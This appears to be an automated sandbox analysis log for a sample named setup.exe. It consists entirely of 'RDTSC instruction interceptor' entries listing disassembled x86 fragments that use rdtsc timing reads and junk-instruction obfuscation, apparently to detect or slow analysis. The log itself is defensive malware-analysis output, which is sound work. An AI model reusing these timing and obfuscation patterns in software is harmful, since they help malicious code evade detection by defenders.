Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8EFBC second address: C8E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CDD6578h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CDD6567h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CDD6579h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CDD656Ch 0x00000081 jp 00007FF32CDD6566h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8E7EC second address: C8E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CFB71F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DE9D49 second address: DE9D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CDD6575h 0x0000000a jl 00007FF32CDD6566h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EAE second address: E05EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EB2 second address: E05F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6576h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CDD6578h 0x00000011 jmp 00007FF32CDD6579h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F02 second address: E05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F07 second address: E05F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E06060 second address: E0609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CFB71F6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CFB71F6h 0x0000001f popad 0x00000020 jmp 00007FF32CFB7205h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E061D3 second address: E061E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CDD6566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08DBA second address: E08E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CFB71F9h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CFB71F8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CFB71FCh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E34 second address: E08E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E38 second address: E08E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 53A7649Bh 0x00000011 jmp 00007FF32CFB7202h 0x00000016 lea ebx, dword ptr [ebp+1244DC23h] 0x0000001c mov dword ptr [ebp+122D26E7h], edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7A second address: E08E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7E second address: E08E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08EE9 second address: E08F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D19B0h], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 xor dword ptr [ebp+122D2EE4h], esi 0x00000018 pop edx 0x00000019 push 47E2DAD0h 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FF32CDD656Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08F15 second address: E08F8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 47E2DA50h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF32CFB71F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007FF32CFB7208h 0x0000002e push 00000003h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 call 00007FF32CFB71FAh 0x00000038 and esi, dword ptr [ebp+122D362Ch] 0x0000003e pop edx 0x0000003f push 00000003h 0x00000041 and edx, dword ptr [ebp+122D1B16h] 0x00000047 push A898F41Fh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CFB71FAh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E0904C second address: E090D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1960h], edx 0x00000013 push 00000000h 0x00000015 mov di, cx 0x00000018 push 4FE6D845h 0x0000001d jmp 00007FF32CDD656Bh 0x00000022 xor dword ptr [esp], 4FE6D8C5h 0x00000029 mov dl, 99h 0x0000002b push 00000003h 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D1C03h], eax 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 sbb cx, BB00h 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FF32CDD6568h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov si, 882Dh 0x0000005c push D27FA0DCh 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E090D2 second address: E090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A523 second address: E2A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A69F second address: E2A6A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A7EB second address: E2A800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FF32CDD6566h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A800 second address: E2A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A804 second address: E2A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A811 second address: E2A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A819 second address: E2A835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6575h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A835 second address: E2A842 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AAEC second address: E2AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2ADFF second address: E2AE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AF88 second address: E2AF92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B108 second address: E2B119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FF32CFB71F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B253 second address: E2B259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B259 second address: E2B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B262 second address: E2B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B268 second address: E2B270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B270 second address: E2B27C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B27C second address: E2B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B280 second address: E2B292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3EE second address: E2B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3F9 second address: E2B41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 js 00007FF32CDD6572h 0x00000016 jl 00007FF32CDD656Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5AC second address: E2B5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5B2 second address: E2B5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E1FA6C second address: E1FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC67 second address: E2BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC6B second address: E2BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF32CFB71FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC85 second address: E2BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007FF32CDD6566h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC98 second address: E2BCA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF90 second address: E2BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF94 second address: E2BFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7205h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F0 second address: E2C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F6 second address: E2C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBC9 second address: E2DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBCD second address: E2DBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FCh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF32CFB71FDh 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBF6 second address: E2DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC03 second address: E2DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC09 second address: E2DC0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC1 second address: E30CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC5 second address: E30CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F679 second address: E2F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F67E second address: E2F684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F684 second address: E2F688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E31055 second address: E3105B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E34166 second address: E3416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37A5B second address: E37A98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FF32CDD6566h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF32CDD6577h 0x00000014 jmp 00007FF32CDD656Fh 0x00000019 js 00007FF32CDD656Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DCD second address: E37DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DD1 second address: E37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE1 second address: E37DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE7 second address: E37DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E380C3 second address: E380C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3838D second address: E38391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E38391 second address: E3839F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C32 second address: E39C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C38 second address: E39C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C3C second address: E39C4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C4A second address: E39C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C698 second address: E3C69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C69E second address: E3C6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C6A2 second address: E3C6B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF32CDD6566h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E52B second address: E3E567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF32CFB71FEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF32CFB7202h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnp 00007FF32CFB7202h 0x0000001e ja 00007FF32CFB71FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E665 second address: E3E66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA3D second address: E3EA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA43 second address: E3EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0AE second address: E3F0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0B7 second address: E3F0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F182 second address: E3F186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F2EA second address: E3F2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D3 second address: E3F5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D7 second address: E3F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
